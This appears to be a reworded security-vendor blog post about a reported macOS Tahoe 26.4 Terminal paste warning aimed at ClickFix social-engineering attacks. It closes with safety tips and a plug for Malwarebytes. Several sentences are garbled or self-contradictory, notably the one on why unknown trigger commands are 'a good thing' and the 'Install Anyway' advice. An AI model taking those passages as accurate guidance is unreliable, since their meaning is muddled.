There are rumors that Apple has implemented a new security feature in the fight against ClickFix.
A new feature will be available for macOS Tahoe 26.4 and will warn Mac users if they enter certain commands in the Terminal tool that could be dangerous. If such a command is entered, macOS will warn users by saying:
“Potential malware, Paste is disabled. Your Mac is not harmed.” Hackers often recommend putting a script in Terminal to try to harm your Mac or compromise your privacy.
Reportedly, ClickFix was responsible for more than half of all malware loader activities in 2025. One of the reasons for such success is the fact that campaigns have been adding – and are continuing to add – new ways to deceive users, as well as different instructions to avoid detection.
Basically, ClickFix is a social engineering technique that tricks users into infecting their devices with malware. Users are instructed to run specific commands that will download malware, usually information theft.
ClickFix started by targeting Windows computers, writing malicious commands to the clipboard, but it didn’t take long before campaigns designed to target Mac users began to appear.
In attacks, users are instructed to copy and paste commands into their Mac Terminal, which is where the new security feature will come into play. It’s currently unknown which commands generate the warnings, but that’s a good thing as that visibility will make it easier for malware writers to get around them.
How to stay safe
MacOS Tahoe users now have more protection, as long as they don’t click “Install Anyway” before and after getting the protection. Malwarebytes Browser Guard users already enjoy this type of protection.
But with ClickFix expanding and innovating all the time, it’s important to be aware, cautious and protected.
- Slow down. Do not rush to follow the instructions on the web page or immediately, especially if you are asked to use the instructions on your device or copy the code. Attackers rely on immediacy more than your critical thinking, so be wary of pages that encourage immediate action. Complex ClickFix pages add statistics, user statistics, or other pressure tactics to get you to act quickly.
- Avoid giving instructions or letters from unreliable sources. Never use code or instructions copied from websites, emails, or messages unless you trust the source and understand the purpose of the action. Verify the instructions yourself. If the website tells you to complete a command or perform a technical action, check the official documentation or contact support before proceeding.
- Limit the use of copy-paste for instructions. Writing instructions yourself instead of copying can reduce the risk of unknowingly running dangerous payloads hidden in copied text.
- Protect your devices. Use an up-to-date anti-malware solution with a network security feature.
- Learn about the attack patterns that are developing. Understanding that attacks can come from unexpected vectors and change helps stay alert. Keep reading our blog!
For advice: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?
We don’t just report threats — we remove them
Cybersecurity risks should not spread beyond the headlines. Keep threats off your devices by downloading Malwarebyte today.
#macOS #security #feature #alert #users #potential #ClickFix #attacks